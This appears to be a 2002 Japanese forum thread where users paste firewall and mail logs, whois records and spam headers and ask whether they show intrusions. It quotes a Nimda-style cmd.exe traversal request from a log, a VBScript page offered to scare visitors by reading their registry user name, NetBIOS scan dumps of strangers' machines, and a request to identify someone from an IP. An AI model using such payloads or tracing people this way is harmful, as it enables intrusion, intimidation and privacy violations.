Jun ** **:**:** hostname sendmail[99999]: XXX99999: ruleset=check_rcpt, arg1=<[email protected]>, relay=********.ne.jp [211.*.*.*], reject=551 <[email protected]>... we do not relay
Jun ** **:**:** hostname sendmail[99999]: XXX99999: from=<[email protected] >, size=0, [211.*.*.*]

>>575
おれのところも大量にきてる。
毎回ソースIPはばらばら。送り元はサーバじゃないみたいなので
新種のウィルスかなぁ。

ウイルスなら有効なメールアドレスをどこから手に入れてるかが問題。
やっぱり使えるサーバを探してるってことなんでしょうか。
スキャンで使った有効なアドレス使われるならｺﾜｲ。

サイトが不正アクセスされて顧客情報が盗まれました。解析おながいします。
http://www.e-colle.com/index/owabi2.html

210.136.106.8:113

株式会社ナチュラルアイデンティティー (Natural Identity)
NA-IDENTITY [210.136.106.0 <-> 210.136.106.63] 210.136.106.0/26
InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-124 [サブアロケーション] 210.136.106.0

>>579

>>417

>>537

http://www.ordb.org/lookup/?host=email.qves.com
データベースの検索結果: email.qves.com (65.121.18.51)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-21 19:33 CET
初回送信ホスト: 24.68.215.101
最終検査日時: 2002-06-10 22:33 CET
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: [email protected]
Received: from qvp0017.freeyankeedom.com (unknown [65.121.18.11])
by BocksCar.ORDB.org (Postfix) with ESMTP id 7CC7B585D
for ; Mon, 10 Jun 2002 22:33:31 +0200 (CEST)
Received: from localhost.localdomain (194.255.24.146 [194.255.24.146])
by qvp0017.freeyankeedom.com [169.254.2.54]
with ESMTP (Dimac Mail Server 1.0.1.0 XP)
id 9A3A9115AE394AEB8C1C1F847BE9466B
at Mon, 10 Jun 2002 14:26:26 -0600
(envelope-from [email protected])
for [email protected]
From: [email protected]
To: [email protected]
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: [email protected]
Subject: ORDB.org check (0.8423967043346390.7953904771) ip=65.121.18.51
Message-Id: <[email protected]>
Date: Mon, 10 Jun 2002 22:33:31 +0200 (CEST)

http://www.ordb.org/lookup/?host=mail.financialhost.com
データベースの検索結果: mail.financialhost.com (65.121.18.51)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-21 19:33 CET
初回送信ホスト: 24.68.215.101 最終検査日時: 2002-06-10 22:33 CET
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin＠bockscar.ordb.org
Received: from qvp0017.freeyankeedom.com (unknown [65.121.18.11])
by BocksCar.ORDB.org (Postfix) with ESMTP id 7CC7B585D
for ; Mon, 10 Jun 2002 22:33:31 +0200 (CEST)
Received: from localhost.localdomain (194.255.24.146 [194.255.24.146])
by qvp0017.freeyankeedom.com [169.254.2.54]
with ESMTP (Dimac Mail Server 1.0.1.0 XP)
id 9A3A9115AE394AEB8C1C1F847BE9466B
at Mon, 10 Jun 2002 14:26:26 -0600
(envelope-from [email protected] )
for marvin＠marvin.ordb.org
From: [email protected]
To: marvin＠marvin.ordb.org
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: marvin＠marvin.ordb.org
Subject: ORDB.org check (0.8423967043346390.7953904771) ip=65.121.18.51
Message-Id: <20020610203331.7CC7B585D＠BocksCar.ORDB.org>
Date: Mon, 10 Jun 2002 22:33:31 +0200 (CEST)

Ｍ＄のサイトを見に行ったら
2002/06/12 21:24:33 207.46.197.113:15650 (www.international.microsoft.com) AAA.BBB.CCC.DDD:24436 ポート 24436 (TCP)
2002/06/12 21:24:32 207.46.197.113:15433 (www.international.microsoft.com) AAA.BBB.CCC.DDD:19783 ポート 19783 (TCP)
2002/06/12 21:23:44 207.46.197.113:8224 (www.international.microsoft.com) AAA.BBB.CCC.DDD:8224 ポート 8224 (TCP)
2002/06/12 21:23:44 207.46.197.113:15655 (www.international.microsoft.com) AAA.BBB.CCC.DDD:21065 ポート 21065 (TCP)
2002/06/12 21:23:06 207.46.197.113:8745 (www.international.microsoft.com) AAA.BBB.CCC.DDD:15114 ポート 15114 (TCP)
2002/06/12 21:22:05 207.46.197.113:28769 (www.international.microsoft.com) AAA.BBB.CCC.DDD:25700 ポート 25700 (TCP)
2002/06/12 21:21:21 207.46.197.113:28769 (www.international.microsoft.com) AAA.BBB.CCC.DDD:25700 ポート 25700 (TCP)
2002/06/12 21:21:20 207.46.197.113:18768 (www.international.microsoft.com) AAA.BBB.CCC.DDD:21536 ポート 21536 (TCP)
2002/06/12 21:20:38 207.46.197.113:8766 (www.international.microsoft.com) AAA.BBB.CCC.DDD:3338 OMF data b
2002/06/12 21:19:48 207.46.197.113:8766 (www.international.microsoft.com) AAA.BBB.CCC.DDD:3338 OMF data b
と妙なポートにアクセスしに来たのですが、不正アクセスですか（ｗ？

もう何かここまでくると、嫌がらせやってるとしか思えん。

IP: 194.19.238.36
Node: VPK_NSP
Group: KANCELEJA
NetBIOS: KANCELEJA 
MAC: 00034769F7AAIP: 210.170.144.32
Node: D7X5W6 TIGRATO
DNS: PPPa1549.e1.eacc.dti.ne.jp
Group: WORKGROUP
NetBIOS: D7X5W6 TIGRATO 
MAC: 444553540000IP: 61.128.207.174
NetBIOS:
__MSBROWSE__

Node: NYJSERVER
Group: CNNYJWORK
MAC: 00E04CED836B
IP: 219.97.5.68
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: OEMCOMPUTER 
MAC: 444553547777
DNS: ntoska050068.ftth.ppp.infoweb.ne.jp
IP: 219.97.5.13
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: OEMCOMPUTER 
MAC: 444553547777
DNS: ntoska050013.ftth.ppp.infoweb.ne.jp
IP: 61.136.185.94
Node: SERVER
NetBIOS:
__MSBROWSE__

Group: WORKGROUP
MAC: 00E04CF4A7CE
IP: 211.178.171.23
Node: SERVER
Group: WORKGROUP
NetBIOS:
__MSBROWSE__

MAC: 00022AC16214
IP: 148.223.141.50
Node: XALAPA
NetBIOS: COMPUTO 
Group: COMPUTO
DNS: xalapa.cobaev.edu.mx
IP: 208.180.198.111
DNS: cdm-208-198-111-gnvl.cox-internet.com

210.143.65.19
Pingされたんですが大丈夫ですか？

http://www.memorize.ne.jp/diary/77/33184/
ココ、ウザイんですが大丈夫ですか？

>>587
マムコついてる分だけ>>587よりマシ。

2002/06/13(00:18:31) W-SV 218.58.34.152 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 218.58.34.152 "/scripts/..%2f../winnt/system32/cmd.exe" ]"
2002/06/13(00:18:31) W-SV 218.58.34.152 [80] 500 267 "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

こいつは何をしようとしてるの？
ちなみにまだＰＩＮＧ帰ってきてるんだけどコイツ。
悪意があるなら・・・ねぇ。

http://pc.2ch.net/test/read.cgi/sec/1020478995/
ココ、ウザイんですが大丈夫ですか？

>>591 AAで埋めてください

>>590
Nimda

↓朝っぱらからウザすぎ鱒。
211.12.201.245

>>594 あーはいはいー

>>417 >>537

210.221.38.232
詳細がわかりません

2002/06/13 18:50:47, TCP port probe, YahooBB219002008006.bbtec.net

2002/06/12 21:56:53, TCP port probe, YahooBB219002008006.bbtec.net

ﾔｯﾎｰのくせに生意気な！

65.198.154.24←こいつウザイよ・・
知り合いのＩＰ漏らしまくって本名まで公表しやがる！
毎日、毎日ムカツクゼこいつ・・・
身元つきとめて！！

トロイなんぞ仕掛けようとするな

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.45.130.0-218.45.131.0
b. [ネットワーク名] IRUMACABLE
f. [組織名] 入間ケーブルテレビ株式会社
g. [Organization] Iruma CATV
m. [運用責任者] NO697JP
n. [技術連絡担当者] NO697JP
p. [ネームサーバ] dns1.jdserve.com
p. [ネームサーバ] ns01.ictv.ne.jp
p. [ネームサーバ] ns02.ictv.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2002/02/07
[返却年月日]
[最終更新] 2002/02/27 10:07:27 (JST)
[email protected]

入間ケーブルテレビ株式会社ってどこよ。

ここか。

http://www.ictv.ne.jp/

>>599
単なるトロイポートスキャン？

>>598

>>417　　　　　　　　　　　　　>>537

azoogle.com (pri=0)
<220-main.azoogle.com ESMTP Exim 3.35 #1
<220-We do not authorize the use of this system to transport unsolicited,
<220 and/or bulk e-mail.
>HELO rlytest.nanet.co.jp
<250 main.azoogle.com Hello ns.nanet.co.jp [210.164.52.3]
>MAIL FROM:< TESThttp://www.nanet.co.jp/rlytest/[email protected] >
<250 < TESThttp://www.nanet.co.jp/rlytest/[email protected] > is syntactically correct
>RCPT TO:<[email protected]>
<550-Host ns.nanet.co.jp (rlytest.nanet.co.jp) [210.164.52.3] is not permitted
<550-to relay through main.azoogle.com.
<550-Perhaps you have not logged into the pop/imap server in the last 30 minutes.
<550-You may also have been rejected because your ip address
<550-does not have a reverse DNS entry.
<550 relaying to <[email protected]> prohibited by administrator

65.198.154.24←まだムカツク・・・泣
串なのね・・コイツ
悔しいなああ

わかってないヤツほど吠えるな・・・

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.139.128.0-210.139.255.0
b. [ネットワーク名] SO-NET
f. [組織名] So-netサービス(ソニーコミュニケーションネットワーク株式会社)
g. [Organization] So-net Service(Sony Communication Network Corporation)
m. [運用責任者] MK2734JP
n. [技術連絡担当者] YY1426JP
n. [技術連絡担当者] SW314JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
p. [ネームサーバ] dnss8.so-net.ne.jp
p. [ネームサーバ] dnss9.so-net.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 1997/11/04
[返却年月日]
[最終更新] 2000/05/08 11:32:38 (JST)
[email protected]

ISPのを貼ってどうすんだ、ｳﾞｫｹがっ！

>>607
whoisコピペ厨を皮肉ったネタかもしれん。

<html>
<body>
<script language="vbscript">
set WshShell = CreateObject("WScript.Shell")
r = WshShell.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Micrsoft\ユーザー情報\\Default first Name")
str = "***<font color='red'>"+r+"</font>***"
decument.write(str)
</script>
</body>
</html>

これで脅しませう。

初心者には、見てもさぱーりわからにゃい・・
勉強1番か・・

218.130.76.185
教えて！
強者さん達・・・力貸してください

/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAMwAA/+4ADkFkb2JlAGTAAAAA
Af/bAIQACAUFBQYFCAYGCAsHBgcLDQoICAoNDwwMDQwMDxEMDQ0NDQwRDxESExIRDxcXGRkX
FyIhISEiJiYmJiYmJiYmJgEICQkQDhAdFBQdIBoVGiAmJiYmJiYmJiYmJiYmJiYmJiYmJiYm
JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYm/8AAEQgARgBQAwERAAIRAQMRAf/EAIwAAAMA
AwEBAAAAAAAAAAAAAAQFBgEDBwACAQACAwEBAAAAAAAAAAAAAAADBAECBQYAEAACAQMDAQYE

厨房しかいないんだな　ここは

そうだったのか・・悲しいな・・

つい1時間くらい前、久々に80番ポート叩いて来たﾔｼが…

TCP 192.168.1.3:3847 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3850 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3851 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3855 211.14.14.129:80 TIME_WAIT
TCP 192.168.1.3:3858 211.14.14.129:80 TIME_WAIT
TCP 192.168.1.3:3859 211.14.14.129:80 TIME_WAIT
TCP 192.168.1.3:3863 211.14.14.129:80 TIME_WAIT
TCP 192.168.1.3:3866 211.14.14.129:80 TIME_WAIT
TCP 192.168.1.3:3867 211.14.14.129:80 TIME_WAIT
TCP 192.168.1.3:3875 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3879 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3882 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3883 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3887 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3890 211.14.14.185:80 TIME_WAIT
TCP 192.168.1.3:3891 211.14.14.185:80 TIME_WAIT

Yahooかよ。。。逝ってくれ。

>>616
それなんかおかしくないか？

80叩かれたのはYahoo側にみえるが

>>616 このスレでもめったに見ない馬鹿だ。

わ、マジ？今慌ててウィルス検索してます。
うちのプロバ、外方向のポート80閉じてるはずなんだが…なんでだろ

家族に迷惑がかからないうちに人生終わらせた方が良いと思われ

>>616
馬鹿というのはおまえの事だ。馬鹿にはわからなかったか?

馬鹿ばっかりだな

>>616 >>620
あなた方こそ、逝って下さい。お願いします。
ネットする前に少々勉強ぐらいして下さい。
また、トンチンカンなこと言うと叩かれるだけですよ。

Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
(whois7.apnic.net)

inetnum: 210.160.208.0 - 210.160.211.255
netname: TX
descr: TianXiang Consulting,Inc.
descr: Consulting
descr: BeiJing
country: CN
admin-c: FW70-AP
tech-c: FW70-AP
mnt-by: MAINT-CNNIC-AP
changed: [email protected] 20010920
source: APNIC

person: fengyu wang
address: No.10 Building,2nd Floor,3rd Block,
address: Anzhen XiLi Chaoyang District,Beijing 100029,China
country: CN
phone: +86-10-64426116-236
fax-no: +86-10-64422237
e-mail: [email protected]
nic-hdl: FW70-AP
mnt-by: MAINT-CNNIC-AP
changed: [email protected] 20010919
source: APNIC

inetnum: 210.160.210.104 - 210.160.210.111
netname: INSSP
descr: INSQUARE CO.,Ltd.
country: JP
admin-c: RE005JP
tech-c: RE005JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks: Japanese output, use the /e switch for English output)
changed: [email protected] 20011218
changed: [email protected] 20020529
source: JPNIC

>>625
要点だけコピペしろよ、このヴォケ！
首でも吊っておけ。

>>616
それってOUTGOING側では・・・
ブラウザがＷＥＢにアクセスしているのを見誤っているヴァカ？

ここ１週間、SOCKS(1080/tcp)へのアクセスが急増してきています。
うちの鯖は、SOCKS上げていて、匿名アクセスを拒否するように設定していて、
実際、自分で外部から匿名アクセスして拒否することを確認しています。

ところが、この１週間、ある決まったＩＰアドレスから、連続して１０００件を超える
接続がSOCKSのログに記録されて、さらに、そのログによると、すべて拒否したことが
記録されました。

で、一応、アクセスを拒否しているらしいのですが、こんなに連続してアクセスが
くると、もしかすると、セキュリティーホールをかいくぐって実際にはSOCKSを使われ
てしまっているのではないかと、疑念がわいてきます。

そのアクセスは、hotmail のSMTPにアクセスしようとしているようで、おそらく、SPAM業者なの
かもしれません。

何か、ここらへんの情報ってないですかね？↓こういうのはあったのですが、もっと詳しいのを。
https://www.netsecurity.ne.jp/article/2/4688.html
tp://mtlab.ecn.fpu.ac.jp/Webcon_archive/010312173523.html

tcpdumpでもしてみますか・・・。でも、政治的な理由があって・・・。

自動ソフトでぶつかってるんじゃないの？

>>628 で、それのどこが【不正アクセス】でどの辺が【解析】な訳？

1214Portって何のサービスなんでしょうか？
さっきから、複数の所から舐められてるんですが・・・

>>631
http://pc.2ch.net/test/read.cgi/sec/1016238340/313-314

>>631
http://www.google.com/search?hl=ja&ie=UTF8&oe=UTF8&safe=active&q=Kazaa+1214%2Ftcp&lr=

KaZaAっていうPTPのツールが使うポートらしい

From:"Legal Council"< [email protected] >
To: [email protected] [email protected] [email protected]
Subject:re:Hire a Reputable Law Firm Inexpensively
Date**
Received:from [209.63.151.252] by ** with ESMTP id **
Received: from qvp0079 ([169.254.6.8]) by email.qves.com with Microsoft SMTPSVC(5.0.2195.2966)
From [email protected]
Message-ID:< [email protected] >
X-Mailer: Microsoft CDO for Windows 2000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
Return-Path: [email protected]

http://www.ordb.org/lookup/?host=email.qves.com
データベースの検索結果: email.qves.com (65.121.18.51)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-21 19:33 CET
初回送信ホスト: 24.68.215.101
最終検査日時: 2002-06-10 22:33 CET
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: [email protected]
Received: from qvp0017.freeyankeedom.com (unknown [65.121.18.11])
by BocksCar.ORDB.org (Postfix) with ESMTP id 7CC7B585D
for ; Mon, 10 Jun 2002 22:33:31 +0200 (CEST)
Received: from localhost.localdomain (194.255.24.146 [194.255.24.146])
by qvp0017.freeyankeedom.com [169.254.2.54]
with ESMTP (Dimac Mail Server 1.0.1.0 XP)
id 9A3A9115AE394AEB8C1C1F847BE9466B
at Mon, 10 Jun 2002 14:26:26 -0600
(envelope-from [email protected])
for [email protected]
From: [email protected]
To: [email protected]
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: [email protected]
Subject: ORDB.org check (0.8423967043346390.7953904771) ip=65.121.18.51
Message-Id: <[email protected]>
Date: Mon, 10 Jun 2002 22:33:31 +0200 (CEST)

>>635
お前はいろんなスレに貼りすぎ。スパムスレにまで貼るなボケ。

2002-06-16 18:20:20 DROP TCP 211.14.14.240 192.168.1.2 80 4796 40 A 1673467748 2189544769 65535 - - -

XPのファイヤウォールなんだが、これって不正アクセス？
IPはヤフーなんだが・・・

すいませんが質問なんですけど、
DOSコマンドで調べてら、何もブラウザ立ち上げていないのに
a202-238-95-165.deploy.akamaitechnologies.com:80
というのが表示されます。
Nortonのセキュリティ入れているのですが、何も反応しません。
どこかにアクセスされているか心配です。
これは一体何なんでしょうか。
フォーマットして、もう一度セットアップしたのですが、また表示されます。
ただ、自分なりにRealPlayerかMediaPlayerからか少しずつインストールして調べたのですが、関係ありませんでした。
それで、お気に入りのファイルを入れたら、そこから表示されました。
お気に入りのファイル（IE）に変な記述されたプログラムが仕組まれているのでしょうか？
誰か助けてください。お願いします。

>>638

で、具体的にどういう被害があったの？

65.118.67.251,portmap をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 65.118.67.251,portmap
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.233.81.29,3393
ﾌﾟﾛｾｽ名は N/A

,portmap をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 65.118.67.251,portmap
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.233.81.28,4435
ﾌﾟﾛｾｽ名は N/A

,portmap をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾛｰｶﾙｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 65.118.67.251,portmap
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ｻｰﾋﾞｽは 211.233.81.28,2950
ﾌﾟﾛｾｽ名は N/A

IP: 219.97.5.40
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: OEMCOMPUTER 
MAC: 444553547777
DNS: ntoska050040.ftth.ppp.infoweb.ne.jp

本物のハカーさんがこのスレみたら暇つぶしにここに貼られた
情報を元にハッキングとかすんのかな？可能性はある？見習い
ハカーがテストにやったりとか

スーパーハッカーさん教えて！

17/JuN/2002 06:52:00 TEST blocked;Out UDP;localhost:1698-
192.168.0.1:2869;Owner:C:\WINDOWS\SYSTEM\OOBE\MSOOBE.EXE

いきなりファイアーウォールのログに残りました、その前に
フランスのIPからポート137にアクセスがあって遮断したんだけど
関係あるのですか？（NEBIOSは切ってあります）

>>640-643

>>417 と >>537 見ろ

>>644
自分で実行していません、ネタではないです。バグですか？
遠隔操作されたのかと、、

211.115.216.98
inetnum: 211.115.216.0 - 211.115.216.255
netname: GNG-IDC-IMC-KR
descr: IMC
descr: 395-65 Shindeabang-Dong DongJak-Gu
descr: SEOUL
descr: 156-010
country: KR
admin-c: JJ1496-KR
tech-c: JJ1497-KR
remarks: This IP address space has been allocated to KRNIC.
remarks: For more information, using KRNIC Whois Database
remarks: whois -h whois.nic.or.kr
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020610
source: KRNIC

person: Jeawan Jeong
country: KR
phone: +82-2-2105-6242
fax-no: +82-2-2105-6242
e-mail: [email protected]
nic-hdl: JJ1496-KR
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20020610
source: KRNIC

>>646

>>417 >>537

ほんと、板汚しスレだな・・・ここ

相変わらずｲﾀｲな

不正アクセスのなんたるかを解って無い馬鹿共がFWのログを貼って喜んでるスレはここ？

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.226.40.0-210.226.41.0
b. [ネットワーク名] AIC-NET
f. [組織名] 山形県産業創造支援センター
g. [Organization] Assistance for Industrial Creativity in
Yamagata
m. [運用責任者] NI458JP
n. [技術連絡担当者] SK1945JP
p. [ネームサーバ] aic-gw.gw.aic.pref.yamagata.jp
p. [ネームサーバ] ns-tk022.ocn.ad.jp
p. [ネームサーバ] yens.ygw.yamagata-rit.go.jp
y. [通知アドレス] [email protected]
[割当年月日] 1999/05/21
[返却年月日]
[最終更新] 2002/02/15 10:08:21 (JST)
[email protected]
]

不正アクセスのなんたるかを解って無い馬鹿共がIPアドレスやドメインの情報を貼って喜んでるスレはここ？

Jun 18 21:55:55 ******* kernel: IN=ppp0 OUT= MAC= SRC=64.71.138.147
DST=***** LEN=48 TOS=0x00 PREC=0x00 TTL=50 ID=60562 DF PROTO=TCP
SPT=80 DPT=4819 WINDOW=1412 RES=0x00 ACK SYN URGP=0J

# host 64.71.138.147
147.138.71.64.in-addr.arpa domain name pointer yasai.2ch.net.

?? yasaiから80へSYN???

>>653

>>417 >>537

やっと６５４か、早く埋めようぜ。こんな板汚しスレ

>>653
じゃあ「SPT=80」の「S」は何の意味だと思ってるのだ？

>>653
2chの串チェック。

しかも、ゴミにもならないログ貼ってる馬鹿共は age でカキコしてるから、
ブラウザとかで見ているここの板住人にとっては無駄な情報（無駄なデータ転送）
以外のなにものでもないな…

正に公害スレだな。ここ…削除依頼出しても駄目だろうしナァ

6355ポートへのアクセスが急増してるんだが、新手のワーム？

>>658
俺はTCP-INの1433が多いです。しかも連日、、何なんだろう？

はぁ 検索しようとはしないし。 お前らFW使うの止めろ。

Return-Path: <[email protected]>
Received: from tip2 ([61.211.246.69]) by t-mta5.odn.ne.jp with ESMTP
id <[email protected]>
Received: from jobin ([192.168.0.90])
by tip2 (8.9.3+3.2W/3.7W) with SMTP id PAA04882
Message-Id: <200106070618.PAA04882@tip2>
From: mail <[email protected]>
Date: Mon, 17 Jun 2002 06:59:14 +0900
Subject: =?ISO-2022-JP?B?GyRCTCQ+NUJ6OS05cCIoGyhCIBskQkpzPTdAKSVQJUohPBsoQiYbJEIjUCNSJE43bxsoQg==?=
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-2022-JP"
Content-Transfer-Encoding: 7bit
X-Mailer: Oshirase-Mailer

$B!cAw?.<T!d%3%`%W%i%s4k2h(B

$B!c2r=|J}K!!d(B

$B"(!Z2r=|![$O?=$7Lu$4$6$$$^$;$s$,!Z2r=|4uK>%"%I%l%9![$+$i2<5-$X(B
$B!Z6u%a!<%k![$r$*Aw$j$/$@$5$k$h$&$*4j$$?=$7$"$2$^$9!#0[$J$C$?%"(B
$B%I%l%9$+$iAwIU$5$l$k>l9g$O7oL>$K%"%I%l%9$r$45-F~$/$@$5$$!#(B
$B>0!"6l>p!"Ld9g$;Ey$K$D$$$F$O!"@?0U$r$b$C$FBP=hCW$7$^$9!#(B
$B!!!!!!!!!!!!!!!!!!!!([email protected]

$B!cDL?.J8!d(B
----------------------------------------------------------------
$B"#E>?&%5%$%H$NJs=7@)%P%J!<Ds7H$bJg=8Cf$G$9!#E>?&5a?&<T$NEPO?>5G'(B
$B?t$K1~$8$F!X(B1000$B1_(B/$B7o!Y99$KE>?&7hDj$G4pK\E*$K!X(B1O$BK|1_(B/$B7o!Y$r$*;Y(B
$BJ'$$CW$7$^$9!#(B

$B!}1?1D<TMM$NJ}$G$+$+$kHqMQEy$O0l@Z$4$6$$$^$;$s!#(B

$B!}$4Ds7H6b(B3000$B1_$r?JDhCW$7$^$9!#(B

$B!}!X$4JV?.$G$O$J$/!Y$3$A$i$NJL%"%I%l%9$K%a!<%k$rD:$1$l$P>\:Y$r$*(B
$BAw$jCW$7$^$9!#!c>\:Y4uK>!d(B
[email protected]


$B")(B106-0032
$BEl5~ET9A6hO;K\LZ(B7-18-5$B!"(B513$B9f(B
$B%3%`!&%W%i%s4k2h(B
[email protected]
----------------------------------------------------------------

そんなの貼ってどうしようってんだ？意味ねーぞ

>>660　すんません。。ばっちり出てきました（ｗ
いちおう、はっとく↓
http://www.jpcert.or.jp/at/2002/at020002.txt

不正アクセスのなんたるかを解って無い馬鹿共がメールヘッダーやメールの内容を貼って喜んでるスレはここ？

http://www.ordb.org/lookup/?host=email.qves.com
データベースの検索結果: email.qves.com (65.121.18.51)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2002-05-21 19:33 CET
初回送信ホスト: 24.68.215.101
最終検査日時: 2002-06-10 22:33 CET
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: [email protected]
Received: from qvp0017.freeyankeedom.com (unknown [65.121.18.11])
by BocksCar.ORDB.org (Postfix) with ESMTP id 7CC7B585D
for ; Mon, 10 Jun 2002 22:33:31 +0200 (CEST)
Received: from localhost.localdomain (194.255.24.146 [194.255.24.146])
by qvp0017.freeyankeedom.com [169.254.2.54]
with ESMTP (Dimac Mail Server 1.0.1.0 XP)
id 9A3A9115AE394AEB8C1C1F847BE9466B
at Mon, 10 Jun 2002 14:26:26 -0600
(envelope-from [email protected])
for [email protected]
From: [email protected]
To: [email protected]
X-ORDB-Envelope-From: [email protected]
X-ORDB-Envelope-To: [email protected]
Subject: ORDB.org check (0.8423967043346390.7953904771) ip=65.121.18.51
Message-Id: <[email protected]>
Date: Mon, 10 Jun 2002 22:33:31 +0200 (CEST)

相変わらずのスレですね。

んでも、文句はあっても誰も実際に解析結果貼らないのは何故？

なおapacheの、「1.3から1.3.24」と、「2.0から2.0.36」にバグ見つかりますた。
サバ管の皆様、注意しましょ｡fix最新版リリはまだのようです。

>>666
ヴァカかおまえ？一体いつの時代の事言ってるんだ？
もう、その修正版リリースされてるし、現在おれは検証中

1.3.26
2.0.39

http://httpd.apache.org/

>>665

>>417
>>537
>>664

203.181.96.97
gsr-ote1.kddnet.ad.jp